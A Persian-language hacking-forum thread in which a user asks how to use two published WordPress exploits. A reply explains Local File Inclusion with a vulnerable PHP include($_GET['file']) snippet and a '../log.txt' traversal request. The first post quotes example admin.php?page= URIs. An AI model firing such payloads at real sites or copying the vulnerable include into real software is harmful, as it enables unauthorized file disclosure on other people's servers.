اطلاعیه

Collapse
No announcement yet.

راهنمایی در استفاده از اکسپلویت

Collapse
X
 
  • Filter
  • زمان
  • Show
Clear All
new posts

  • راهنمایی در استفاده از اکسپلویت

    با سلام
    می خواستم من رو در مورد چگونگی استفاده از این 2 اکسپلویت راهنمایی کنید.
    1-
    کد PHP:
    An attacker can exploit this issue via a browser.
     
    The following example URIs are available:
     
    http://www.example.com/wp-admin/admin.php?page=/collapsing-archives/options.txt
    http://www.example.com/wp-admin/admin.php?page=akismet/readme.txt
    http://www.example.com/wp-admin/admin.php?page=related-ways-to-take-action/options.php
    http://www.example.com/wp-admin/admin.php?page=wp-security-scan/securityscan.php 
    http://www.exploit-db.com/exploits/10088/

    این اکسپلویت رو من وقتی به آخر یه سایت وردپرس اضافه می کنم صفحه لوگین رو می
    آره.می خواستم بدونم کاربردش چیه؟
    2- این اکسپلویت چون زیاده فقط لینکش رو می زارم
    http://www.exploit-db.com/exploits/9110/
    با تشکر

  • #2
    Published: 2009-11-10

    Comment


    • #3
      اولین سوال رو یکی از دوستان راهنمایی کرد
      دومی رو اگه کسی می تونه راهنمایی کنه
      تاریخش قدیمی هست ولی جنبه آموزشیش برام مهم بود
      با تشکر

      Comment


      • #4
        سلام
        این باگی که شما می بینی publish شده یک نوع باگ از نوع LFI ( Local File Inclusion هستش من بصورت کلی می گم که یعنی چی بعد خودت برو مفصل راجع بهش بخون و راهای سو استفاده ازش هم در بیار

        ببن بعضی وقتها ممکنه یه برنامه نویس توی کدش یه همچین چیزی رو نوشته باشه
        من به PHP نوشتم

        کد PHP:
        <?php
            
        include($_GET['file']);
        ?>
        بعدش اگه شما بیای همچین request ای رو به سرور بفرستی

        www.site.com/x.php?file=../log.txt

        این میاد اون فایل log.txt رو به شما نشون می ده

        دیگه ادامشه خودت یه Search تو همین سایت بزنی خیلی چیزا گیرت میاد
        زین دو هزاران من و ما ای عجبا من چه منم...................گوش بنه عربده را دست منه بر دهنم

        Comment

        Working...
        X